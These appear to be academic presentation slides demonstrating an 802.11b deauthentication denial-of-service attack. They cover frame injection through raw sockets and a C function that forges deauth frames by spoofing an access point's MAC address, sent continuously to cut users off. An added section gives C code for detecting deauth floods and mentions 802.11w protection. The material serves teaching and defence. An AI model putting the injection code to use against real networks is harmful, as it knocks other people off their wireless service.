
802.11 Attack Demo

Haobo Zhou

(hzhou@liacs.nl)

L I A C S

http://www.liacs.nl/home/hzhou


What Will Be Covered

  • Overview of 802.11b

  • Wireless network sniffer

  • Frame Injection

  • Deauth/Disassociation Attack

  • Attack Demo


NO!! Thanks

OK!!

Dinner??


ISO OSI Model and 802.11b

Overview of 802.11b

Obtained From http://alpha.fdu.edu/~kanoksri/IEEE80211b.html


Overview of 802.11b

  • Runs over 2.4 GHz

    • DSSS - Direct Sequence Spread Spectrum

    • Channels

      • FCC (US) - 11 Channels (1-11)

      • ETSI (EU) - 13 Channels (1-13)

      • France - 4 Channels (10-13)

      • Japan - 14 Channels (1-14)

    • Uses CSMA/CA


Overview of 802.11b

  • Uses WEP for Encryption

    • “Wired Equivalent Privacy”

    • Uses RC4

    • 40-bit or 104-bit static key with 24-bit IV


Overview of 802.11b

  • Consists of 3 main protocol types

    • Management

    • Control

    • Data


Overview of 802.11b

Ad Hoc


Overview of 802.11b

Infrastructure


Overview of 802.11b

[Figure: exchange between Node and Access Point: Beacon, Authentication Req, Authentication Resp, Association Req, Association Resp. Access Point accepts Node; Node is associated.]


Wireless network sniffer

Wireless network detection

  • NIC with monitor mode support

    • why?

      • Management frame

      • Frames belonging to others

  • Tools

    • Kismet

    • others


Wireless network sniffer

Networking Interface Card Mode

  • Managed (Infrastructure)

  • Ad-Hoc (Ad Hoc)

  • Monitor (hardware support??)

  • Master (acts as an AP)


Wireless network sniffer

  • KISMET

    • An 802.11 layer 2 wireless network sniffer

    • Runs on Linux

    • Ethereal/Tcpdump compatible data logging

    • Over 20 supported card types

    • Open source code


Kismet


Frame Injection

  • NIC

    • support ?

  • Device Driver

    • support frame injection?

      • Yes - very good

      • No - change it!

  • User program


Frame Injection

  • User program

    • C code on Linux

    • Raw socket programming

      • Use PF_PACKET interface to access the link layer

      • sd=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));


Deauthentication Attack

  • Management frames can control link characteristics and physical medium properties

  • 802.11b management frames are NOT authenticated

    • Why is this bad?


Deauthentication Attack

  • Denial of Service – De-authentication

    • Use MAC address of Access Point

    • Send deauthenticate frames

      • Send continuously

    • Users are unable to reassociate with AP


Deauthentication Attack

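[Figure: 802.11 station state diagram]

  • State 1: Unauthenticated, Unassociated

  • State 2: Authenticated, Unassociated

  • State 3: Authenticated, Associated

  • State 1 → State 2: Successful authentication

  • State 2 → State 1: Deauthentication

  • State 2 → State 3: Successful association

  • State 3 → State 2: Disassociation

  • State 3 → State 1: Deauthentication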


Deauthentication Attack

Deauth frame structure

  • Attacker must spoof AP MAC address in Src Addr and BSSID

  • Sequence Control field handled by firmware (not set by attacker)


Deauthentication Attack

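    /* Build and send one deauthentication frame.
     * struct a3_80211, FC_TYPE_MGT and MGT_DEAUTH are defined elsewhere
     * (not shown on the slide); sd is assumed to be the PF_PACKET raw
     * socket opened on the Frame Injection slide. */
    void send_deauth (__u8 *dst, __u8 *bssid)
    {
        struct {
            struct a3_80211 hdr;    /* 3-address 802.11 header */
            __u16 reason;           /* reason code */
        } mgt_frame;

        memset(&mgt_frame, 0, sizeof(mgt_frame));
        mgt_frame.hdr.mh_type = FC_TYPE_MGT;
        mgt_frame.hdr.mh_subtype = MGT_DEAUTH;
        memcpy(&(mgt_frame.hdr.mh_mac1), dst, 6);    /* destination */
        memcpy(&(mgt_frame.hdr.mh_mac2), bssid, 6);  /* source: AP MAC */
        memcpy(&(mgt_frame.hdr.mh_mac3), bssid, 6);  /* BSSID */
        mgt_frame.reason = 2;
        send(sd, &mgt_frame, sizeof(mgt_frame), 0);
    }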
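
Seen from the monitoring side, the same frame layout gives a detector for this attack. The following C is an added example, not from the presentation: it parses the deauthentication/disassociation frame fields described above and flags a flood. The threshold, window, function names and sample frame are assumptions constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define THRESHOLD 5      /* assumed alert level: 5 frames ...    */
#define WINDOW_MS 1000   /* ... within one second; tune per site */

struct mgmt_event { uint8_t subtype, dst[6], src[6], bssid[6]; uint16_t reason; };
struct flood_detector { uint64_t ts[THRESHOLD]; unsigned n; };  /* keep one per BSSID */

/* Constructed sample: broadcast deauth, reason 2, made-up BSSID 02:00:00:00:00:01 */
static const uint8_t SAMPLE_DEAUTH[26] = {
    0xC0, 0x00, 0x00, 0x00,              /* frame control, duration  */
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,  /* addr1: destination       */
    0x02, 0x00, 0x00, 0x00, 0x00, 0x01,  /* addr2: source            */
    0x02, 0x00, 0x00, 0x00, 0x00, 0x01,  /* addr3: BSSID             */
    0x00, 0x00, 0x02, 0x00 };            /* sequence control, reason */

/* Parse a bare 802.11 frame (no radiotap, no FCS): 1 and *ev filled for deauth/disassoc, else 0. */
int parse_deauth(const uint8_t *f, size_t len, struct mgmt_event *ev) {
    if (len < 26) return 0;                  /* 24-byte header + 2-byte reason */
    uint8_t subtype = f[0] >> 4;             /* 10 = disassociation, 12 = deauthentication */
    if ((f[0] & 0x0F) != 0 || (subtype != 10 && subtype != 12)) return 0;  /* version 0, management */
    ev->subtype = subtype;
    memcpy(ev->dst, f + 4, 6);
    memcpy(ev->src, f + 10, 6);
    memcpy(ev->bssid, f + 16, 6);
    ev->reason = (uint16_t)(f[24] | (f[25] << 8));   /* little-endian */
    return 1;
}

/* Feed one captured frame; returns 1 once the last THRESHOLD deauth or
 * disassoc frames all arrived within WINDOW_MS. */
int flood_observe(struct flood_detector *d, const uint8_t *f, size_t len, uint64_t now_ms) {
    struct mgmt_event ev;
    if (!parse_deauth(f, len, &ev)) return 0;
    d->ts[d->n++ % THRESHOLD] = now_ms;      /* ring buffer of recent arrival times */
    return d->n >= THRESHOLD && now_ms - d->ts[d->n % THRESHOLD] <= WINDOW_MS;
}

/* Replay 10 sample frames gap_ms apart; 1-based index of the first alert, or 0. */
int demo_flood(unsigned gap_ms) {
    struct flood_detector d = {0};
    for (int i = 0; i < 10; i++)
        if (flood_observe(&d, SAMPLE_DEAUTH, sizeof SAMPLE_DEAUTH, (uint64_t)i * gap_ms)) return i + 1;
    return 0;
}

int main(void) { printf("%d %d\n", demo_flood(100), demo_flood(500)); return 0; }
```

A detector like this only reports the flood. IEEE 802.11w (Protected Management Frames) is the control that lets stations reject forged deauthentication and disassociation frames.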


Question ?

deauth-attack demo continues


802.11 Deauth-attack DEMO

Attacker

  • Hardware

    • Laptop

    • Wireless card

      • Atheros 5212 chip

      • Monitor mode support

  • Software

    • Device driver

      • Madwifi

      • Open source project

      • Two patches to enable frame injection

    • User program

      • Fata_jace.c

Victim

  • Hardware

    • Laptop

    • Wireless card

  • Software

    • Ping

      • Use ping to verify the connection


Thanks

  • Xu Li

  • Wei Wang

  • Google

